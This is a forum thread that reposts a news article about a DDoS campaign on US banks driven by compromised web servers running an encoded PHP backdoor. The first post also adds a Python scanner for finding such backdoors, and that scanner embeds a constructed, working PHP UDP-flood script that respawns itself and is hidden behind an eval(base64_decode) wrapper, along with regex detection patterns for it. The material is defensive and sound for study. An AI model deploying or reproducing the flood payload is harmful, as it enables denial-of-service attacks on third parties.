
Thread: Secret footsoldier targeting banks reveals meaner, leaner face of DDoS

  1. #1
    Regular Member

    Join Date
    May 2012
    Location
    Windsor Ontario

    Secret footsoldier targeting banks reveals meaner, leaner face of DDoS



    [Image: Screenshots showing the denial-of-service PHP script before and after it has been decoded.]

    Over the past two weeks, a new wave of Web attacks has battered major US banks, causing disruptions for many of their online services. Now, an Israel-based security firm has uncovered one of the secret footsoldiers behind the mass assault: a compromised website that was rigged to unleash a torrent of junk traffic on three of the world's biggest financial institutions.
    The discovery by Web application security firm Incapsula helps explain the strategy behind the four-month-old campaign, which has been carried out under the flag of a group calling itself Izz ad-Din al-Qassam—rather than compromise and recruit thousands or tens of thousands of end-user PCs to carry out the distributed denial-of-service attacks, why not target a handful of Web servers that have orders of magnitude more bandwidth and processing power?
    Over the weekend, Incapsula researchers noticed a general-interest website located in the UK that was exhibiting suspicious behavior. They quickly discovered a backdoor that had been planted on it that was programmed to receive instructions from remote attackers. An analysis showed the website, which had just recently contracted with Incapsula, was being directed to send a flood of HTTP and UDP packets to major banks including PNC Financial Services, HSBC, and Fifth Third Bank.
    "Since the commands were blocked by our service the attack was mitigated even before it started, so we can't be absolutely sure about the scope of damage this attack would cause," Incapsula Security Analyst Ronen Atias wrote in a blog post published Tuesday. "Still, it is safe to assume that it would be enough to seriously harm an average medium-sized website."
    The blog post came the same day that purported Izz ad-Din al-Qassam members posted a new message that warned the attacks would continue until the removal of a YouTube video the group says is offensive to Muslims. In recent days, banks including BB&T, Fifth Third Bank, Ally Financial Corp., and PNC have all reportedly confirmed site or online banking access issues. The unidentified site discovered by Incapsula was most likely compromised as a result of weak security. The administration password was simply "admin."
    The backdoor was programmed to accept attack code remotely sent by the attackers. The PHP scripts contained detailed instructions, which among other things included precisely timed directions intended to order attacks to be stopped and then renewed just as the target website was starting to recover. The scripts were programmed to open a new instance of themselves each time they were executed, causing the torrents to grow exponentially larger over time. Because the compromised Web server was located in a shared hosting environment, there was enough bandwidth and processing power available to accommodate the ever-growing demands.
    Incapsula's blog post may help to explain observations aired three months ago that crippling attacks on the websites of Bank of America, Wells Fargo and at least three other large banks were executed by hundreds of compromised servers. The extra horsepower of the machines created peak floods exceeding 60 gigabits per second, a volume big enough to knock even large sites offline unless they take special action to block the attacks.
    Ronen told Ars the attack code he observed was separate from a relatively new attack tool known as "itsoknoproblembro," which was deployed on many of the compromised servers discovered three months ago. Still, the ability of the new code to work in shifts and to gradually multiply itself appeared to make the recently discovered attack highly effective. Adding to the success, attackers need little more than a laptop and a decent command of PHP and hacking techniques to ply their trade. The considerable amount of electricity, bandwidth, and equipment required were all supplied by unwitting accomplices.
    Indeed, the command and control server used to funnel commands to the compromised Web server was itself a Turkish website, which Incapsula's Atias also believes was compromised.
    "This is just another demonstration of how security in the internet is always determined by the weakest link," he wrote. "Simply neglecting to manage [an] administrative password in a small site in the UK can be very quickly exploited by botnet shepherds operating obscurely out of Turkey to hurl large amounts of traffic at American banks. This is a good example of how we are all just a part of a shared ecosystem where website security should be a shared goal and a shared responsibility."

    Secret footsoldier targeting banks reveals meaner, leaner face of DDoS | Ars Technica
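The article describes the backdoor only in outline: an encoded PHP script that is decoded at run time (the screenshot caption), takes orders from a remote operator, floods targets with HTTP and UDP traffic, and starts a new copy of itself each time it runs. A practitioner hosting PHP sites would want a way to sweep a web root for files with those hallmarks. The script below is an added example, not Incapsula's tooling or the actual script they found; it assumes base64/gzip-style obfuscation (the page only says the script was "decoded"), uses illustrative indicator weights, and plants two constructed sample files (a benign `index.php` and a `uploads/cache.php` backdoor) in a temporary directory so it runs offline.

```python
"""Heuristic scan of a web root for PHP backdoors of the kind the post describes:
an encoded script that decodes itself at run time, takes targets from a remote
operator, floods them over UDP sockets, and re-launches itself.
Added example: indicator list, weights and sample files are constructed for
illustration and are not Incapsula's signatures or the real script."""
import base64
import os
import re
import tempfile

# (name, pattern, weight). Weights are illustrative, not calibrated. PHP
# function names are case-insensitive, hence re.I throughout.
INDICATORS = [
    # run-time decoding of an embedded payload (the "before/after decoding" view)
    ("eval_of_decoded", re.compile(
        r"""eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(""", re.I), 5),
    ("base64_blob", re.compile(r"""['"][A-Za-z0-9+/]{200,}={0,2}['"]"""), 3),
    # raw UDP socket toward an attacker-chosen host (UDP flood)
    ("udp_socket", re.compile(r"""fsockopen\s*\(\s*['"]udp://""", re.I), 4),
    # target/duration taken from the request (remote tasking); common in benign code too
    ("remote_param", re.compile(r"""\$_(?:GET|POST|REQUEST)\s*\[\s*['"]\w+['"]\s*\]""", re.I), 1),
    # spawning another PHP process (the "new instance of itself" behaviour)
    ("self_respawn", re.compile(
        r"""(?:exec|shell_exec|popen|proc_open)\s*\([^)]*(?:php|__FILE__)""", re.I), 4),
    # pacing/shift behaviour inside an attack loop
    ("timed_loop", re.compile(r"""\b(?:sleep|usleep|set_time_limit)\s*\(""", re.I), 1),
]
B64_CALL = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]""", re.I)


def decode_layers(src, max_layers=5):
    """Return src plus every base64 payload peeled out of it, layer by layer,
    so indicators hidden inside the encoded body are scanned as well."""
    layers = [src]
    frontier = src
    for _ in range(max_layers):
        decoded = []
        for m in B64_CALL.finditer(frontier):
            try:
                data = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            decoded.append(data.decode("utf-8", errors="replace"))
        if not decoded:
            break
        frontier = "\n".join(decoded)
        layers.append(frontier)
    return "\n".join(layers)


def scan_source(src):
    """Score one PHP source string; returns (score, sorted indicator names)."""
    text = decode_layers(src)
    hits = {name for name, rx, _ in INDICATORS if rx.search(text)}
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, sorted(hits)


def scan_tree(root, threshold=6):
    """Walk a web root and return [(path, score, hits)] at or above threshold."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".php5", ".inc")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = scan_source(fh.read())
            if score >= threshold:
                findings.append((path, score, hits))
    return findings


# Constructed sample payload: takes target/port/duration from POST, floods over
# UDP with short pauses, then relaunches itself. Illustrative only.
INNER = """<?php
$t = $_POST['target']; $p = $_POST['port']; $d = (int)$_POST['duration'];
$end = time() + $d;
while (time() < $end) {
    $s = @fsockopen("udp://$t", $p, $errno, $errstr, 1);
    if ($s) { fwrite($s, str_repeat("X", 1024)); fclose($s); }
    usleep(1000);
}
exec("php " . __FILE__ . " > /dev/null 2>&1 &");
"""
BACKDOOR = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(INNER.encode()).decode()
BENIGN = '<?php $name = htmlspecialchars($_GET["name"]); echo "Hello, $name"; ?>'


def demo():
    """Plant the two constructed files in a temp web root and scan it.
    Returns {relative_path: (score, hits)} for flagged files only."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(BENIGN)
        with open(os.path.join(root, "uploads", "cache.php"), "w") as fh:
            fh.write(BACKDOOR)
        return {os.path.relpath(p, root).replace(os.sep, "/"): (s, h)
                for p, s, h in scan_tree(root)}


if __name__ == "__main__":
    for path, (score, hits) in demo().items():
        print(f"{path}: score={score} hits={','.join(hits)}")
```

Run it against a real document root by calling `scan_tree("/var/www")`; the benign file scores 1 (it reads a request parameter, as most PHP does) and stays below the threshold, while the encoded sample scores on the decoded layer as well as the wrapper. Treat a hit as a lead for manual review, not a verdict: the same patterns appear in some legitimate minifiers and installers, and a backdoor using an obfuscation this scanner does not peel (custom XOR, split strings) will be missed.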

  2. #2
    Regular Member

    Join Date
    Jul 2012
    Location
    México

    Re: Secret footsoldier targeting banks reveals meaner, leaner face of DDoS

    They're taking 1 cent from every account again :P
